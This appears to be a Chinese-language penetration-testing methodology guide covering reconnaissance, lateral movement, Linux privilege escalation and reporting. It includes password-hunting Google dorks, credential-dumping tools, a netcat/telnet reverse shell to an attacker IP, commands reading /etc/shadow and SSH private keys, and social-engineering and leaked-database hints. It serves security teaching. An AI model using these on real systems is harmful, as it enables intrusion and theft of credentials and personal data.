这个世界上只有两种人，黑客和被黑客攻击的人。

Ax 收集范围阶段

渗透测试之前，必须确认授权的测试范围，哪些是能测试的，哪些是不能测试的。将测试的目标收集到一个备忘录中。

Bx 测试目标阶段

确定范围后，针对范围进行测试。

1. 域名相关信息

whois

Whois 是一个用来查询域名是否已经被注册，以及注册域名的详细信息的数据库（如域名所有人、域名注册商、域名注册日期和过期日期
等）。通过域名Whois服务器查询，可以查询域名归属者联系方式，以及注册和到期时间。
可以使用命令，也可以使用在线：
whois，whois是互联网的一个协议，用工具也行，用命令行也行，网页在线也行，都可以。
在线：

• http://whois.chinaz.com/

• https://www.virustotal.com/gui/home/url

• https://www.threatminer.org/

DNS

DNS信息，在收集DNS信息的时候，主要关注域名注册商，管理员联系方式，电话和邮箱，子域名信息等。
（1）ip138：https://site.ip138.com/ https://ipchaxun.com/
（2）百度云观测：http://ce.baidu.com/index/getRelatedSites?site_address=baidu.com
（3）circl：https://www.circl.lu/services/passive-dns/#passive-dns
（4）hackertarget：https://hackertarget.com/find-dns-host-records/
（5）riddler：https://riddler.io/search?q=pld:baidu.com
（6）bufferover：https://dns.bufferover.run/dns?q=.baidu.com
（7）dnsdb：https://dnsdb.io/zh-cn/search?q=baidu.com
（8）ipv4info：http://ipv4info.com/
（9）robtex：https://www.robtex.com/dns-lookup/
（10）chinaz：https://alexa.chinaz.com/
（11）netcraft：https://searchdns.netcraft.com/
（12）securitytrails：https://docs.securitytrails.com/v1.0/reference#get-domain
（13）dnsdumpster：https://dnsdumpster.com/
（14）sitedossier：http://www.sitedossier.com/
（15）threatcrowd：https://www.threatcrowd.org/
（16）siterankdata：https://siterankdata.com/
（17）findsubdomains：https://findsubdomains.com/

企业查

小蓝本
启信宝
搜赖网
天眼查
企查查
信用视界

备案

天眼查 https://www.tianyancha.com
备案查询https://www.beian88.com/

2. 挖掘隐藏目录

扫描网站目录结构，看看是否可以遍历目录，或者敏感文件泄漏
robots.txt：指定了网站中不想被robot访问的目录
网站备份文件：网站源码、配置文件、数据库文件
后台目录：弱口令，万能密码，爆破
安装包：获取数据库信息，甚至是网站源码
上传目录：截断、上传图片马等
mysql管理接口：弱口令、爆破，万能密码，然后脱裤，甚至是拿到shell
安装页面 ：可以二次安装进而绕过
phpinfo：会把目标配置的各种信息暴露出来
编辑器：fck、ke、等
IIS短文件利用：条件比较苛刻 Windows、Apache等
探测目标网站后台目录可以通过字典扫描、目录爬行、开源程序、搜索引擎、二级域名、端口站点、备份文件等方式查找，相关工具有：
IntelliTamper、wwwscan 、御剑 、weakfilescan、 dirbuster、dirb、QWASP、Google Hacking等

后台

物理路径探测
对目标写入webShell时需要用到真实物理路径。
1 探针文件
很多网站在搭建时会留下包含有网站信息的文件，说明等。常见的探针遗留文件名
Phpinfo.php
info.php
test.php
2 报错获得
多用于容错做的不是很好的网站。可以访问404页面、动态URL加特殊符号（英文单引号等）、错误的SQL语句等。
3 后台获得
如果可以登录到目标后台，一般后台首页会有一些说明，包括CMS版本、支持的组件、更新日期、数据库信息、物理路径、IP地址等。
4 IIS 高版本特性
IIS7-IIS8.5 如果配置不当，都有可能会存在这个问题，只有访问404的路径，就会爆出物理路径和IIS版本信息。
5 搜索引擎探测
Mail服务器
Mail服务器可能会有web漏洞：比如：XSS、SQL、XXE、心脏出血、破壳漏洞等等。mail弱口令爆破，mail钓鱼，mail可能是外网入
口，因为传递VPN密码，服务器密码等等。

敏感文件泄露

利用github、gitee等代码托管平台
• CMS识别
• git源码泄露
• svn源码泄露
• hg源码泄漏
• 网站备份压缩文件
• WEB-INF/web.xml 泄露
• DS_Store 文件泄露
• SWP 文件泄露
• CVS泄露
• Bzr泄露
• GitHub源码泄漏
• php特性配置说明文件composer.json泄露

利用搜索引擎

“Login: ” “password =” filetype: xls ( 搜索存储在excel文件中含有password的数据)。
allinurl: auth_user_file.txt (搜索包含在服务器上的 auth_user_file.txt 的文件）。
filetype: xls inurl: “password.xls” (查找 用户名和密码以excel格式）这个命令可以变为“admin.xls”.
intitle: login password (获取登陆页面的连接，登陆关键词在标题中。)
intitle: “Index of” master.passwd (密码页面索引)
index of / **backup** ( 搜索服务器上的备份文件）
intitle: index.of people.lst (包含people.list的网页）
intitle: index.of passwd.bak ( 密码备份文件)
intitle: “**Index** **of**” pwd.db (搜索数据库密码文件).
intitle: “**Index** **of** .. etc” passwd (安装密码建立页面索引）.
index.of passlist.txt (以纯文本的形式加载包含passlist.txt的页面).
index.of.secret (显示包含机密的文档，.gov类型的网站除外) 还可以使用: index.of.private
filetype: xls username **password** email (查找表格中含有username和**password**的列的xls文件).
”*# PhpMyAdmin MySQL-Dump” filetype: txt (列出包含敏感数据的基于php的页面)*
inurl: ipsec.secrets-history-bugs (包含只有超级用户才有的敏感数据). 还有一种旧的用法 inurl: ipsec.secrets “holds **shared** secrets”
inurl: ipsec.conf-intitle: manpage
inurl: “wvdial.conf” intext: “**password**” (显示包含电话号码，用户名和密码的连接。）
inurl: “user.xls” intext: “**password**” (显示用户名和密码存储在xls的链接。)
filetype: ldb **admin** (web服务器查找存储在数据库中没有呗googledork删去的密码。）
inurl: **search** / admin.php (查找**admin**登陆的php页面). 如果幸运的话，还可以找到一个管理员配置界面创建一个新用户。
inurl: password.log filetype:**log** (查找特定链接的日志文件。)
filetype: reg HKEY_CURRENT_USER username (在HCU (Hkey_Current_User)路径中查找注册表文件(registyry)。)
“**Http**://username: **password** @ www …” filetype: bak inurl: “htaccess | passwd | shadow | ht **users**”(查找备份文件中的用户名和密码。)
filetype:ini ws_ftp pwd (通过ws_ftp.ini 文件查找**admin**用户的密码)
intitle: “**Index** **of**” pwd.db (查找加密的用户名和密码）
inurl:**admin** inurl:**backup** intitle:index.of (查找关键词包含**admin**和**backup**的目录。)
“**Index** **of**/” “**Parent** **Directory**” “WS _ FTP. ini” filetype:ini WS _ **FTP** PWD (WS_FTP 配置文件， 可以获取**FTP**服务器的进入权限)
ext:pwd inurl:(service|**authors**|administrators|**users**) “*# -FrontPage-”*
filetype: **sql** ( “passwd **values** *” |” **password** **values** *” | “pass **values** **“) 查找存储在数据库中的**sql**代码和密码。 )

3. 挖掘开放子域

使用工具
Sylas https://github.com/Acmesec/Sylas
SubDomainsBrute
wydomain https://github.com/ring04h/wydomain.git
layer
御剑
7kbscan
dnsenum
oneforall：https://github.com/shmilylty/OneForAll

4. 端口开放服务

使用工具 nmap

常见端口
3306 mysql
1433 mssql
1521 oracle
5432 postgresql
6379 redis
27017 mongodb
8080 tomcat/resin/jetty
137 samba
5900 vnc
443 https
21 FTP弱密码
22 SSH弱密码
23 telnet弱密码
25 邮件伪造,vrfy/expn查询邮件用户信息,可使用smtp-user-enum工具来自动跑
53 DNS溢出、远程代码执行、允许区域传送,dns劫持,缓存投毒,欺骗以及各种基于dns隧道的远控
69 尝试下载目标及其的各类重要配置文件
80 IIS6 RCE
80-89 应用服务器端口
110 POP3 可尝试爆破,嗅探
111 NFS 权限配置不当
137 SMB
143 IMAP 爆破
161 SNMP 爆破默认团队字符串,搜集目标内网信息
139 smb、嗅探
161 snmp默认团体名/弱口令漏洞
389 LDAP注入、匿名访问、弱口令
443 poodle漏洞、应用服务器端口
445 ms17-010、ms08-067
464 kpasswd Kerberos 口令和钥匙改换服务
512,513,514 Linux rexec 可爆破,rlogin登陆
554 RTSP
873 rsync
1080 ss 可以尝试使用ss代理工具进行代理
1194 OpenVPN 想办法钓VPN账号,进内网
1352 Lotus 弱口令,信息泄漏,爆破
1433 mssql（sql server） 注入,提权,sa弱口令,爆破
1500 ISPmanager 弱口令
1521 Oracle tns爆破,注入,弹shell…
1723 PPTP 爆破,想办法钓VPN账号,进内网
2082,2083 cPanel 弱口令
2049 NFS 权限配置不当
2181 Zookeeper
2375 docker
2601,2604 Zebra 默认密码zerbra
3000 grafan
3128 Squid 弱口令
3306 mysql弱密码
3312,3311 kangle 弱口令
3389 ms12-020、Windows rdp shift后门[需要03以下的系统]、爆破
3690 svn泄露,未授权访问
4848 GlassFish 弱口令
4899 radmin
5000 Flask、Sybase/DB2 爆破,注入
5432 postgresql 爆破,注入,弱口令
5900,5901,5902 VNC 弱口令爆破 VNC提权
5984 couchdb
5985 SOAP
6379 redis未授权访问
6443 Kubernetes
7001 weblogic、websphere
7002 WebLogic Java反序列化,弱口令
7778 Kloxo 主机面板登录
8000 Ajenti 弱口令
8069 Zabbix 远程执行,SQL注入
8080 jenkins、GeoServer、Kubernetes、JBOSS、libssh、poodle
8180 libssh - cve-2018-10933、JBOSS
8393、8983、8081、80、443、8080 solr
8443 Plesk 弱口令
8440-8450,8080-8089 应用服务器端口（可尝试经典的topn,vpn,owa,webmail,目标oa,各类Java控制台,各类服务器Web管理面板,各类Web中间件漏 洞利用,各类Web框架漏洞利用等等……）
8161 ActiveMQ后台弱密码(admin/admin)漏洞以及put写shell
9080-9081,9090 WebSphere（应用服务器） Java反序列化/弱口令
9043 、9443 poodle
9200，9300 Elasticsearch未授权访问漏洞、elasticsearch远程命令执行、Elasticsearch任意文件读取
11211 memcache
27017，27018 mongodb
43958 Serv-U
50070，50030 hadoop
61616 ActiveMQ

5. 识别指纹信息

Whatweb
https://www.yunsee.cn/
BugScaner：http://whatweb.bugscaner.com/look/
云悉指纹：http://www.yunsee.cn/finger.html
WhatWeb：https://whatweb.net/
cmsmap：https://github.com/dionach/CMSmap
kali wpScan：针对WordPress版本网站
kali joomScan：针对Joomla!版本网站
whatweb:https://github.com/urbanadventurer/WhatWeb
在线cms识别:http://whatweb.bugscaner.com
潮汐指纹:http://finger.tidesec.net/
数字观星:https://fp.shuziguanxing.com/#/
云悉:http://www.yunsee.cn/finger.html
Wappalyzer:https://github.com/AliasIO/wappalyzer
http://whatweb.bugscaner.com/look/

6. 寻找真实地址

思路
网站识别（多地ping、国外ping、超级ping）。17ce.com
邮箱。
证书。
备案。
接口。https://get-site-ip.com/
SSRF记录。 a服务器开启日志 b发生ssrf请求a 被记录真实IP
测试文件扫描。
敏感文件。如phpinfo。真实IP泄露
黑暗引擎（FOFA）。icon识别一下。
全网扫描。https://github.com/Tai7sy/fuckcdn
RSS订阅。
APP反编译搜索/截取APP的请求信息。
修改hosts文件指向。

超级ping在线：
https://www.itdog.cn/ 推荐
https://ping.sx/ 极力推荐
http://ping.chinaz.com/
http://ping.aizhan.com/
http://ce.cloud.360.cn/
http://ping.chinaz.com/
http://ping.aizhan.com/
http://ce.cloud.360.cn/
https://www.17ce.com/

7. 识别防御设施

发现WAF的方法

• 手工：提交恶意数据

• 工具：WAFW00F、Nmap、Sqlmap

8. 社会工程艺术

QQ、weibo、支付宝、脉脉、领英、咸鱼、短视频、人人、贴吧、论坛
外网信息
有些人喜欢把自己的生活传到外网
推特、ins、fb等

当然，有句话，在互联网上，没有你查不到的信息。tg，sgk。。你懂的。

另外，近源攻击也是一种手段，伪装成客服，或内部员工绕过前台，进入机房。

通俗的说，就是一个字，钓鱼，骗，人类心理弱点。

具体可参见《欺骗的艺术》

9. 善用搜索引擎

→ google .com
→ Shodan .io
→ Censys .io
→ Hunter .io
→ redhuntlabs .com
→ fullhunt .io
→ onyphe .io
→ fofa .so
→ socradar .io
→ synapsint .com
→ binaryedge .io
→ ivre .rocks
→ crt .sh
→ spyse .com
→ vulners .com
→ PublicWWW .com
→ Pulsedive .com
→ ZoomEye .org
→ intelx .io
→ WiGLE .net
→ reposify .com
→ viz. greynoise .io

空间测绘

Shodan
FoFa
ZoomEye
Hunter
360Quake

10. 扩展思路

网盘泄露

公众号

小程序

Cx 内网横向阶段

1、用户列表
windows用户列表 分析邮件用户，内网[域]邮件用户，通常就是内网[域]用户

2、进程列表
析杀毒软件/安全监控工具等 邮件客户端 VPN ftp等

3、服务列表
与安全防范工具有关服务[判断是否可以手动开关等] 存在问题的服务[权限/漏洞]

4、端口列表
开放端口对应的常见服务/应用程序[匿名/权限/漏洞等] 利用端口进行信息收集

5、补丁列表
分析 Windows 补丁 第三方软件[Java/Oracle/Flash 等]漏洞

6、本机共享
本机共享列表/访问权限 本机访问的域共享/访问权限

7、本用户习惯分析
历史记录 收藏夹 文档等

8、获取当前用户密码工具

Windows
• mimikatz
• wce
• Invoke-WCMDump
• mimiDbg
• LaZagne
• nirsoft_package
• QuarksPwDump fgdump
• 星号查看器等
Linux
• LaZagne
• mimipenguin
浏览器
• HackBrowserData
• SharpWeb
• SharpDPAPI
• 360SafeBrowsergetpass
其他
• SharpDecryptPwd
• Decrypt_Weblogic_Password
• OA-Seeyou

常见命令

ipconfig:
ipconfig /all ------> 查询本机 IP 段，所在域等
net:
net user ------> 本机用户列表
net localgroup administrators ------> 本机管理员[通常含有域用户]
net user /domain ------> 查询域用户
net group /domain ------> 查询域里面的工作组
net group "domain admins" /domain ------> 查询域管理员用户组
net localgroup administrators /domain ------> 登录本机的域管理员
net localgroup administrators workgroup\user001 /add ----->域用户添加到本机 
net group "Domain controllers" -------> 查看域控制器(如果有多台)
net view ------> 查询同一域内机器列表 net view /domain ------> 查询域列表
net view /domain:domainname
dsquery
dsquery computer domainroot -limit 65535 && net group "domain
computers" /domain ------> 列出该域内所有机器名
dsquery user domainroot -limit 65535 && net user /domain------>列出该域内所有用户名
dsquery subnet ------>列出该域内网段划分
dsquery group && net group /domain ------>列出该域内分组 
dsquery ou ------>列出该域内组织单位 
dsquery server && net time /domain------>列出该域内域控制器 

Dx 内网提权阶段

提权前的信息收集
操作系统
发行类型 版本

cat /etc/issue 
cat /etc/*-release  
cat /etc/lsb-release # Debian
cat /etc/redhat-release # Redhat

内核版本 32位还是64位

cat /proc/version
uname -a uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

查看环境变量 环境变量中可能存在密码或API密钥

cat /etc/profile 
cat /etc/bashrc
cat ~/.bash_profile  
cat ~/.bashrc  
cat ~/.bash_logout  
env set

路径（Path) 如果对该变量内的任何文件夹都具有写权限，则可以劫持某些库或二进制

文件：PATH 
echo $ PATH 

查看打印机有无

lpstat -a 

应用与服务

哪些服务正在运行？

哪个服务具有哪个用户特权？

ps aux
ps -ef top
cat /etc/services

root正在运行哪些服务？在这些易受攻击的服务中，值得仔细检查！

ps aux | grep root ps -ef | grep root

安装了哪些应用程序？他们是什么版本的？他们目前在运行吗？

ls -alh /usr/bin/ 
ls -alh /sbin/ 
dpkg -l 
rpm -qa 
ls -alh /var/cache/apt/archivesO 
ls -alh /var/cache/yum/

服务设置是否配置错误？是否附有（脆弱的）插件？

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

计划了哪些工作？（计划任务）

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

是否有纯文本用户名和/或密码？

检查Web服务器连接到数据库的文件（config.php或类似文件）
检查数据库以获取可能被重用的管理员密码
检查弱密码

grep -i user [filename] 
grep -i pass [filename] 
grep -C 5 "password" [filename] 
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

通讯与网络

系统具有哪些NIC？它是否连接到另一个网络？

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

查看网络配置设置，确定关于该网络的信息，DHCP服务器？DNS服务器？网关？

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

其他哪些用户和主机正在与系统通信？

在这种情况下，用户正在运行某些只能从该主机获得的服务。我们无法从外部连接到服务。它可能是开发服务器，数据库或其他任何东西。这些服务可能以root用户身份运行， 或者其中可能存在漏洞。

netstat -anlp 
netstat -ano
bash
lsof -i
lsof -i :80 grep 80 /etc/services
netstat -antup 
netstat -antpx
netstat -tulpn
chkconfig --list chkconfig --list | grep 3:on
last
w

IP和/或MAC地址

arp -e
route
/sbin/route -nee

数据包嗅探是否可能？可以看到什么？

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
注意：tcpdump tcp dst [ip] [端口]和tcp dst [ip] [端口]

我们有shell吗？

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets sys
是否可以进行端口转发？重定向流量并与之交互

注意：FPipe.exe -l [本地端口] -r [远程端口] -s [本地端口] [本地IP]

FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
注意：ssh-[L / R] [本地端口]：[远程IP]：[远程端口] [本地用户] @ [本地IP]

ssh -L 8080:127.0.0.1:80 root\@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root\@192.168.1.7 # Remote Port

注意：mknod backpipe p; nc -l -p [远程端口] backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost

可以使用隧道吗？在本地远程发送命令

ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

机密信息和用户

id 
who 
w
last
cat /etc/passwd \| cut -d: -f1 \ # List of users
grep -v -E "^#" /etc/passwd |
cat /etc/sudoers
sudo -l

可以找到哪些敏感文件？

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

home/root目录有什么”有用”的地方吗？如果可以访问

ls -ahlR /root/
ls -ahlR /home/

里面有密码吗？脚本，数据库，配置文件还是日志文件？密码的默认路径和 位置

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

用户正在做什么？是否有纯文本密码？他们在编辑什么？

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

用户信息

cat ~/.bashrc cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

私钥信息

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

文件系统

可以在/ etc /中写入哪些配置文件？能够重新配置服务？

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null    # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null     # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null         # Other
find /etc/ -readable -type f 2>/dev/null             # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone

在/ var /中可以找到什么？

ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

网站上是否有任何设置/文件（隐藏）？有数据库信息的任何设置文件吗？

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

日志文件中是否有任何内容（可以帮助”本地文件包含”）

cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, m
如果命令受到限制，获取交互shell

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

是否存在安装文件系统？

mount
df -h

是否有任何卸载的文件系统？

cat /etc/fstab

“Linux文件权限”是什么？

find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID

可以在哪里写入和执行？一些“常见”位置：/ tmp，/ var / tmp，/ dev / shm

find  / -writable -type d 2>/dev/null     # world-writeable folders
find / -perm -222 -type d 2>/dev/null     # world-writeable folders
find / -perm -o w -type d 2>/dev/null     # world-writeable folders
find / -perm -o x -type d 2>/dev/null     # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null  # world-writeable

任何”问题”文件吗？Word可写的”没人”文件

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
find /dir -xdev \( -nouser -o -nogroup \) -print

准备和查找漏洞利用代码
安装/支持哪些开发工具/语言？

find / -name perl\*
find / -name python\*
find / -name gcc\* find / -name cc

如何上传文件？

find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

系统是否已完全打补丁？
内核，操作系统，所有应用程序，其插件和Web服务

使用工具
windows内核漏洞提权
检测网址：http://bugs.hacking8.com/tiquan/
检测类:Windows-Exploit-Suggester,WinSystemHelper,wesng
利用类:windows-kernel-exploits，BeRoot

Ex 撰写报告阶段

将收集到的信息，利用模板进行编写报告内容。
一个合格的渗透测试报告，包含规范，如目标，受众，时间，密级等等
信息收集包括自己渗透测试成功的漏洞证明，包括截图和时间戳，脚本，日志记录，方便复现。
对于甲方而言，应当将报告的内容写得更加通俗易懂，而非技术实现，如漏洞的产生造成危害，如何修复等。
对于技术人员，应当将报告的内容写得更加专业，如复现步骤，原理和详细的修复方案。

当然，信息收集远远不止以上列举，仅仅提供些许思路，更多思路欢迎指点。